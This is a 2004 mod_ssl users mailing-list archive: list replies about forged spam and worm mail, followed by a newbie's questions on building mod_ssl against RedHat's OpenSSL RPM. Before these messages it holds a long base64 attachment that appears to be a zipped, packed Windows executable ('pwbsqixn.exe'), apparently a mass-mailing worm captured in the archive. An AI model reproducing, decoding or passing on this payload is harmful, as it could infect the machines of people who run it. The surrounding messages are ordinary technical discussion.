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
xiux5t5cbOlWZT8gHQIZgea2CHJzbZ7Yv2Ynw1lKc4UA8s11dPTMC00SaERiU+mvXD5uIHN1
mA2Ep5I9hAtIbJBKOEftdMK+Ch0rtrUmDGgGMyErIscECm1wiTFEEXFqU4lFHF9txywwAWCJ
EMWA////3wYwETAeMCYwLDBGMEwwXDATMR4xJDFONcc14DUi/////zYwNk82LzlJOVQ5ZTmB
OYo5rTm+Occ54DnvOfo5Azoh////5To4Ol06aDqJOqk6yzrvOhw7Lzs+O1c7XDthO/f///+F
O507wDtLPF48aDwvPTk9Qz1IPWs9iD2XPaE9eF8g2CKGWEcLMoYy/////6EyqjK1Mt4y5DLs
MgkzTTOiM9Iz5TPrMxA0/zQYNco1/////+41mzY1N1k3vDfON9o3DjgrOKc4FjmaO7U8vjzd
PMA930Tz/w8+HD5VPqc+9j4DPzgSzzDVMN/////dMO3PQjGBMaYxsTG6Mcsx0DH+MQ8yKDJ0
NH80jP////803zTuNBE1IzU/NXs1yTWsNrc2wDbONtQ25zb5NiE3J3/3//83MDc5N043ZTdw
N5A3qTevN8M3z3/9NyE4YzjZ/3/D/zj1OAA5CzkdOSofxjlQOnk6izqfOq46ATsH/////zsW
O2c7bDtyO307mzupO8M75jv2OwE8Mjw4PD48RDxK//8N/zxQPFY8XDxiGW48dDx6PIA8hjyM
PJI8mDye/////zykPKo8sDy2PLw8wjzIPM481DzaPOA85jzsPPI8+Dz+///W/zwEPQo9ED0W
PRyWPSg9Lj00PTo9QD1GPUw9fotb/FI9WD1ePRpqPSV2PXw9gv///xttjj2UPZo9oD2mPaw9
sj24Pb49xD3KPdA91j1AauH/3D3iPeg97j30PfqPPh1VkbAIDW6ghIL/gAPf/SH/lev+itGK
kNlflYPZ2gctqoLZ0AJ3KDD3B9giIYT3fT68F0Ao95QDnKY0FPcRIBR8NoUwF2KyAGR0ByD3
dAwoBjdAshwgGKhXEAoCSQz3TNkscmgB63rgs9kgFKciECOUJISCBKcRATYI6GTB4L1gCX7P
CSBgwbKldyAhwbIhu2AmOJCmc4EYYVZqqYh2gDArBXZespwQ0hCbKriy3bQXwhALs5ZV8MDB
pAHcKmAjI2HWCNSOBaAJN4vXoupT4Aj+s+tf3YH6sP8W6NOXK+g/ALe7Ox6jZBEJ6yQOHoM9
NncheA2//zUIIBQgAO9txwUKmScCuVQu1V+sEJv4jIsQ3+4wGu8yMRFUBv87MUYxWjFgMQda
p0CI4lxkFfSCZM0IMycuwEix7mRtX2N5VyMVYNQb4ssBxggqOKKIJEVaFoIJjN0YAQUbxSsG
sW5Q3WMvJG5lQRBFeGkUZEDdviD3Ek0OdWxo2VbxyE7rQRM6itmsWBHzQSgHVaAiQEHNDpCA
ATPqQS2b1g7TomZRJwKKTRjUQA7fAZFBjUHLAbJkUMneAbcMeRNCAbMKRgHss2FQjAltcGkK
bhjUO3Cnk3t+SygV0QrkaW8TCnjvUHlDbGFnvUQlO1HjDQZLFvXjAfJ8SVrQVuRB3ExIBGqM
AhgBMAhVsm5SlHRjc7olVEcB0QxvAIkK1qkKhbOwBGoB9u+Z1EigTghyAYFaCLbTEKjTbDam
ADGhOs02F7Kc5dmMGJE5AQuSiGWzyfTMLM8D+QQAQg8BDmCiXECOXhQqA5AvEsS5bwAEoPm6
qE9kOpAD1SFqtwJXqADEkHJyKs4MDkLU965sG/sGxCwPGckS9FQwownJslIYc8wdQtRsAOvE
an8ovpUnG7TGc5IAAAAAAAAAgAQA/wAAAAAAAAAAYL4AgEAAjb4AkP//V4PN/+sQkJCQkJCQ
igZGiAdHAdt1B4seg+78Edty7bgBAAAAAdt1B4seg+78EdsRwAHbc+91CYseg+78Edtz5DHJ
g+gDcg3B4AiKBkaD8P90dInFAdt1B4seg+78EdsRyQHbdQeLHoPu/BHbEcl1IEEB23UHix6D
7vwR2xHJAdtz73UJix6D7vwR23Pkg8ECgf0A8///g9EBjRQvg/38dg+KAkKIB0dJdffpY///
/5CLAoPCBIkHg8cEg+kEd/EBz+lM////Xon3uVsAAACKB0cs6DwBd/eAPwB18osHil8EZsHo
CMHAEIbEKfiA6+gB8IkHg8cFidji2Y2+AJAAAIsHCcB0PItfBI2EMKSzAAAB81CDxwj/lgi0
AACVigdHCMB03In5V0jyrlX/lgy0AAAJwHQHiQODwwTr4f+WELQAAGHpWmL//wAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAwAAACAAAIAOAAAAYAAAgAAAAAAAAAAA
AAAAAAAAAQABAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAUAAAAKTAAADoAgAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAEAAQAAAHgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAJAAAACQwwAA
FAAAAAAAAAAAAAAAoJAAACgAAAAgAAAAQAAAAAEABAAAAAAAgAIAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA
/wD/AP//AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAACHd3d3d3d3d3d3d3cAAAAAj//////////////3AAAAAI//////////////9w
AAAACP/3d3d3d3d3d3f/cAAAAAj/9///f/d3/3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3
d3d393f/d3//cAAAAAj/9///f/d3d3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3d3d393f/
d3//cCgoKCgoKCgof////3d//3CCgoKCgoKCgn//9/////9wKP///////yh3d3d3d3//cIL/
///4KCiCf//3//9//3Ao8oKCgvKCKH//9///f/9wgvgoKC8oL4J3d3d3d3//cCjygoLygo8o
f//3//9//3CC/ygvKCgvgn//9///f/9wKP/y8oKP/yh3d3d3d3//cIL/LygoKP+Cf//3//9/
/3Ao8vKCgoKPKH//9///f/9wgvgoKPgoL4J3d3d3gAAAACjygo//go8o/////4//eACC////
////gv////+P94AAKCgoKCgoKCh3d3//j3gAAIKCgoKCgoKC/////4eAAAAAAAAI////////
//+IAAAAAAAACP//////////gAAAAAAAAAiIiIiIiIiIiIAAAAD///////////4AAAD+AAAA
/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAMAAAAHAAAAD/4AAB/+AAA/
/gAAf4iTAAAAAAEAAQAgIBAAAQAEAOgCAAABAAAAAAAAAAAAAAAAADDEAAAIxAAAAAAAAAAA
AAAAAAAAPcQAABjEAAAAAAAAAAAAAAAAAABKxAAAIMQAAAAAAAAAAAAAAAAAAFbEAAAoxAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABgxAAAbsQAAH7EAAAAAAAAjMQAAAAAAACaxAAAAAAAAKrE
AAAAAAAAS0VSTkVMMzIuRExMAGFkdmFwaTMyLmRsbABTSEVMTDMyLmRsbAB1c2VyMzIuZGxs
AABMb2FkTGlicmFyeUEAAEdldFByb2NBZGRyZXNzAABFeGl0UHJvY2VzcwAAAFJlZ0Nsb3Nl
S2V5AAAAU2hlbGxFeGVjdXRlQQAAAEZpbmRXaW5kb3dBAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQSwECFAAKAAAAAAAARmEw
Sh/MnQA+AAAAPgAADAAAAAAAAAAAACAAAAAAAAAAcHdic3FpeG4uZXhlUEsFBgAAAAABAAEA
OgAAACo+AAAAAA==

----------uwltcqqqgdrfpqobpbvp--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 17:08:41 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 74F96A8A4F; Mon,  1 Mar 2004 17:08:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from manatee.mojam.com (manatee.mojam.com [199.249.165.175])
	by master.modssl.org (Postfix) with ESMTP id 891CCA8A4B
	for ; Mon,  1 Mar 2004 17:08:28 +0100 (CET)
Received: from montanaro.dyndns.org (titan.itcs.northwestern.edu [129.105.214.230])
	by manatee.mojam.com (8.12.1-20030917/8.12.1) with ESMTP id i21G8PFM032200;
	Mon, 1 Mar 2004 10:08:25 -0600
Received: from montanaro.dyndns.org (localhost [127.0.0.1])
	by montanaro.dyndns.org (8.12.9/8.12.6) with ESMTP id i21G8LBu010825;
	Mon, 1 Mar 2004 10:08:21 -0600 (CST)
Received: by montanaro.dyndns.org (8.12.9/8.12.2/Submit) id i21G8L76010822;
	Mon, 1 Mar 2004 10:08:21 -0600 (CST)
From: Skip Montanaro 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <16451.24564.798062.590548@montanaro.dyndns.org>
Date: Mon, 1 Mar 2004 10:08:20 -0600
To: modssl-users@modssl.org, jhallgren@ghweb.com
Subject: Re: this list
In-Reply-To: <38200F24-6B96-11D8-B313-000A95C4667C@ghweb.com>
References: <38200F24-6B96-11D8-B313-000A95C4667C@ghweb.com>
X-Mailer: VM 7.17 under 21.5  (beta16) "celeriac" (+CVS-20040209) XEmacs Lucid
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Skip Montanaro 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


    Jeff> Why do I keep getting spam from the modssl-users list when I'm not 
    Jeff> subscribed to it (anymore)??
    Jeff> Please stop.

*sigh*

This is caused by typical spam/virus/worm forgery techniques.  You can be
assured that nobody on the modssl list is actually spamming you.  You'll
understand about forgery once spam is sent out forged so it looks like you
sent it.

Look around for a decent spam filter.

-- 
Skip Montanaro
Got gigs? http://www.musi-cal.com/submit.html
Got spam? http://spambayes.sf.net/
skip@pobox.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 17:48:14 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6B4F5A8A4F; Mon,  1 Mar 2004 17:48:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-1021150.0x50a3cb26.arcnxx16.customer.tele.dk [80.163.203.38])
	by master.modssl.org (Postfix) with ESMTP id 047ECA8A49
	for ; Mon,  1 Mar 2004 17:48:02 +0100 (CET)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 6C5595E0243; Mon,  1 Mar 2004 17:47:57 +0100 (CET)
Date: Mon, 1 Mar 2004 17:47:57 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: this list
Message-ID: <20040301164757.GA12346@gw>
Mail-Followup-To: modssl-users@modssl.org
References: <38200F24-6B96-11D8-B313-000A95C4667C@ghweb.com> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Mar 01, 2004 at 10:49:18AM -0500, Kevin wrote:
> I am guessing that no one is able to block the mail from mmx.engelschall.com
> on the modssl.org list?
> 
Since mmx.engelschall.com is part of the modssl/openssl mail infrastructure,
that would effectively kill all mail to both modssl and openssl lists.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 17:59:05 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2E7E2A8A53; Mon,  1 Mar 2004 17:59:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rwcrmhc12.comcast.net (rwcrmhc12.comcast.net [216.148.227.85])
	by master.modssl.org (Postfix) with ESMTP id A90D6A8A4B
	for ; Mon,  1 Mar 2004 17:59:03 +0100 (CET)
Received: from bob (h000625de95e6.ne.client2.attbi.com[24.218.154.127])
          by comcast.net (rwcrmhc12) with SMTP
          id <2004030116590101400o8eg4e>; Mon, 1 Mar 2004 16:59:01 +0000
From: "Bob Cohen" 
To: 
Subject: Install Questions
Date: Mon, 1 Mar 2004 11:58:14 -0500
Organization: b.p.e.Creative
Message-ID: <008301c3ffae$637c78c0$6501a8c0@bob>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bob Cohen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Please forgive the newbie questions, I'm a web designer bumbling my way
through system administration.  I really did make an effort to search
the archives. :-)  Time's running short to get this project done.  

The box on which I'm working has RedHat 7.3 with openssl-0.9.6b-35.7
installed as an RPM.

---Question 1---
Step 3 of the INSTALL document says OpenSSL must be configured with
-fPIC to install mod_ssl as a DSO.  Can this be done with the OpenSSL
RPM provided by RedHat? I looked into doing a source install of OpenSSL
but don't have time to deal chase down and reinstall the dependencies of
which there are quite a few.

--Question 2--

Step 5 (a), the "All-In-One mod_ssl+APACI way [FOR JOE AVERAGE]" to
install mod_ssl suggests 

"--with-ssl=../openssl-0.9.x \" 

as one of the arguments for the "./configure" statement.  

As mentioned above my OpenSSL is an RPM install; therefore, there is no
source directory. Do I leave out "--with-sql=../openssl-0.9.x"? The
install document also suggests using "SSL_BASE=SYSTEM" in place of
"SSL_BASE=../openssl-0.9.x"; do I then put "SYSTEM" in place of
"../openssl-0.9.x"?  E.g., "--with-ssl=SYSTEM"

--Question 3--

This install is for a low traffic server. Is it worth it for me to use
shared memory support?  MM is also installed as an RPM on this system.


Thanks in advance for the assistance.

Bob Cohen
b.p.e.Creative
http://www.bpecreative.com
Design and production services for the web
Put creative minds to work for you

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 18:19:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 63505A8A4F; Mon,  1 Mar 2004 18:19:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from boggle.pobox.com (boggle.pobox.com [208.58.1.193])
	by master.modssl.org (Postfix) with ESMTP id 945AFA8A4B
	for ; Mon,  1 Mar 2004 18:18:58 +0100 (CET)
Received: from colander (localhost [127.0.0.1])
	by boggle.pobox.com (Postfix) with ESMTP id 886DD54F2A
	for ; Mon,  1 Mar 2004 12:18:56 -0500 (EST)
Received: from jester.pobox.com (jester.pobox.com [64.71.166.114])
